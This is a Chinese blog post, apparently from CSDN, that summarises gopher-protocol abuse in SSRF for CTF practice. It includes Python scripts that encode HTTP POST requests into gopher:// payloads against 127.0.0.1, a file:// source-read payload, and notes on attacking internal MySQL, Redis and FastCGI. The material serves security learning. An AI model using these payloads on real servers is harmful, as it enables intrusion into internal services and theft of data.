gopher协议总结

最新推荐文章于 2022-08-14 17:02:17 发布
最新推荐文章于 2022-08-14 17:02:17 发布
阅读量6.2k 收藏 43
点赞数 9
分类专栏: Web安全 SSRF 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/121667791
版权

文章目录

定义

gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面

利用:

攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求

发送GET请求和POST请求

gopher协议的格式:gopher://IP:port/_TCP/IP数据流

GTE请求

构造HTTP数据包

URL编码、替换回车换行为%0d%0a,HTTP包最后加%0d%0a代表消息结束

发送gopher协议, 协议后的IP一定要接端口

POST请求

POSTGET传参的区别:它有4个参数为必要参数

需要传递Content-Type,Content-Length,host,post的参数

切记:Content-Length和POST的参数长度必须一致

例子:

使用file协议读取源码:?url=file:///var/www/html/index.php

python脚本生成payload(POST和GTE请求都适用)

import urllib.parse

payload = """
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=a68a3b03e80ce7fef96007dfa01dc077
"""
tmp = urllib.parse.quote(payload) #对payload中的特殊字符进行编码
new = tmp.replace('%0A','%0D%0A') #CRLFL漏洞
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)# 对新增的部分继续编码
print(result)

构造一个提交文件的POST请求

首先抓取一个正常提交文件的数据包,然后使用上述脚本将其转换为gopher协议的格式

import urllib.parse
​
payload = \
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 293
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-a09b30b9de9fb026.sandbox.ctfhub.com:10080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz0BDuCoolR1Vg7or
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-a09b30b9de9fb026.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/flag.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
​
------WebKitFormBoundaryz0BDuCoolR1Vg7or
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
​
hello world!
------WebKitFormBoundaryz0BDuCoolR1Vg7or
Content-Disposition: form-data; name="submit"
​
submit
------WebKitFormBoundaryz0BDuCoolR1Vg7or--
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

gopher打FastCGI

看我这一篇

gopher打redis

看我这一篇

gopher打mysql

gopher打mysql,就是利用gopher协议传shell到mysql中。

首先Mysql存在三种连接方式

  • Unix套接字;
  • 内存共享/命名管道;
  • TCP/IP套接字;

MySQL客户端连接并登录服务器时存在两种情况:需要密码认证以及无需密码认证。

  • 当需要密码认证时使用挑战应答模式,服务器先发送salt然后客户端使用salt加密密码然后验证
  • 当无需密码认证时直接发送TCP/IP数据包即可

这儿对localhost和127.0.0.1做一个区别

localhost也叫local ,正确的解释是:本地服务器。
127.0.0.1的正确解释是:本机地址(本机服务器),它的解析通过本机的host文件,windows自动将localhost解析为127.0.0.1。
localhot(local)是不经网卡传输的,这点很重要,它不受网络防火墙和网卡相关的的限制。127.0.0.1是通过网卡传输,依赖网卡,并受到网络防火墙和网卡相关的限制
简单说
当我们通过mysql -hlocalhost -uname去连接的时候,没有经过网卡,使用的是unix套接字连接,这种时候我们tcpdump是抓不到包的
当我们需要抓取mysql通信数据包时必须使用TCP/IP套接字连接。
mysql -h 127.0.0.1 -uname

我们平常打mysql最常用的就是打无密码的mysql

但是我们在用gopher还是需要用dict协议去得到mysql的端口(默认是3306)

直接使用的gopherus工具

在这里插入图片描述

直接快速生成payload

参考的CTF题

ISITDTU CTF Friss

从一道CTF题目看Gopher攻击MySql

参考文章

https://xz.aliyun.com/t/9554#toc-0(重要)

Z3eyOnd
关注
  • 9
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8156
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
【网络安全 | HTTP】 gopher协议原理、语法及利用总结
最新发布
等风来
08-01 8934
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
gopher协议
qq_50613938的博客
11-02 1021
gopher协议gopher协议 :互联网上使用的分布型的文件搜集获取网络协议,是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息 使用方法:gopher://ip:port/_payload Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端
python 构造gopher payload
weixin_48266255的博客
08-14 327
python 构造gopher
CTF gopher协议
a3320315的博客
11-03 7267
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
php禁用gopher协议,SSRF攻击-运用gopher协议构造POST包--emmmm(http://10.112.68.215:10004/index.php?action=login)...
weixin_42629522的博客
03-18 341
还是天枢的一道CTF题,启程!分析题目,自己注册账户并登陆后,提示输入一个url,网站会自己运行查找网页信息。 emmmmm,很挑衅,网站就当作服务器,我们在url框中输入一个伪造的执行代码,让他运行获取到机密信息,哼哼。这就是SSRF(服务端请求伪造),伪造的代码留给服务端自己执行并返回我们需要的机密信息。在里面乱输入了一些东西,没有任何反馈。此时,我们就要扫描网站啊。1.扫描网站+分析rob...
Gopher协议使用总结1
08-03
Gopher协议使用总结Gopher协议是一种早期的互联网通信协议,主要被用于文档的检索和分布。在HTTP出现之前,Gopher协议是Internet上重要的信息获取工具,它由明尼苏达大学的Anklesaria命名,其名称来源于大学的...
064-Gopher协议使用总结.pdf
09-20
"Gopher协议使用总结" Gopher协议是一种通信协议,用于设计、分配、搜索和检索互联网文档中的信息。在超文本传输协议(HTTP)出现之前,它是互联网上最重要的信息检索工具,Gopher生态系统被认为是万维网的前身。 ...
网络协议知识总结.docx
12-23
网络协议知识总结 本文档总结了网络协议的知识点,涵盖了物理层、数据链路层、网络层、传输层和应用层等多个方面。以下是从这些内容中提炼出的重要知识点: 一、物理层 * 物理层定义了网络中的物理结构,包括...
Aftershock Gopher Server-开源
05-27
Gopher协议是一种互联网上的文件检索协议,诞生于20世纪90年代初,与HTTP协议并行存在,但相对较小众。尽管Gopher在今天的互联网中可能不如HTTP普遍,但在某些特定场景下,如对隐私和简洁性有高要求的用户群中,它...
curl详解命令总结
09-24
它能够处理多种网络协议,包括但不限于FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE以及LDAP。其核心优势在于其灵活性和广泛的支持性,适用于数据获取、上传、测试网络服务等场景。 #### 二、获取页面与...
Go 为什么选择 Gopher 作为吉祥物?
EDDYCJY的博客
01-25 1820
阅读本文大概需要 2 分钟。大家好,我是 polarisxu。Go 语言的诞生,伴随着出现了 Gopher。现在 Go 爱好者通常自称为 Gopher。实际上,Gopher 最开始只是表示...
ssrf中gopher协议的利用
V
10-29 5597
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
SSRF中phar协议gopher协议的利用
weixin_44687621的博客
09-07 985
我们在学习SSRF漏洞的时候,经常会只关注file协议等,因为利用方式简单。实际上随着php版本的提升和编程技术的规范,能够直接利用的漏洞越来越少了,所以学习使用phar和gopher协议是很有必要的。 phar协议php中反序列漏洞,形成的原因首先需要一个unserialize()函数来处理我们传入的可控的序列化payload。但是如果对unserialize()传入的内容进行限制,甚至就不存在可利用的unserialize()函数的时候,就可以借助phar协议触发反序列化操作了 phar流包装器不能
Gopher协议与ssrf
qq_44657899的博客
04-30 4622
文章目录0x01 reference和环境准备0x02 使用gopher构造GET、POST请求构造GET请求Gopher发送请求HTTP POST请求:0x03 CTF实战 0x01 reference和环境准备 参考 Gopher协议在SSRF漏洞中的深入研究(附视频讲解) 参考 Gopher协议与redis未授权访问 Gopher协议格式: URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流 gopher的默认端
curl和gopher协议(ssrf的利用)
Z_Grant的博客
11-05 7170
文章目录一、基础知识的学习(1) cURL(2) PHP的curl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
SSRF漏洞-Gopher协议扩展利用
小刚的博客
08-20 2302
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshell Gopher协议 Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它 但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛 利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击, 并可以构造发送GET,POST.
一些网络协议(Gopher,PPPoE,IGMP......)
08-22 1055
  我经常上网,但可能对网络协议确不是很清楚,只知道些最经常用到的HTTP,DNS。。。不知道举些什么了:(还是把他们收集一下吧,从这些协议中可以知道互联网形成的过程。Gopher协议英文原义:The Internet Gopher Protocol中文释义:(RFC-1436)网际Gopher协议        注解:这是一种互联网没有发展起来之前的一种从远程
SSRF漏洞分析与利用
3569
11-06 7665
http://www.91ri.org/17111.html 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 漏洞产生 以curl为例,漏洞代码为ssrf.php Default 1234567
Gopher协议:互联网早期的信息检索工具与内网攻击手段
Gopher协议使用总结 Gopher协议,源于1990年代早期的互联网,是一个古老的通信协议,用于在互联网上查找、检索和分享文档。它在HTTP协议流行之前是重要的信息检索工具,被誉为万维网的早期雏形。Gopher协议的名字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值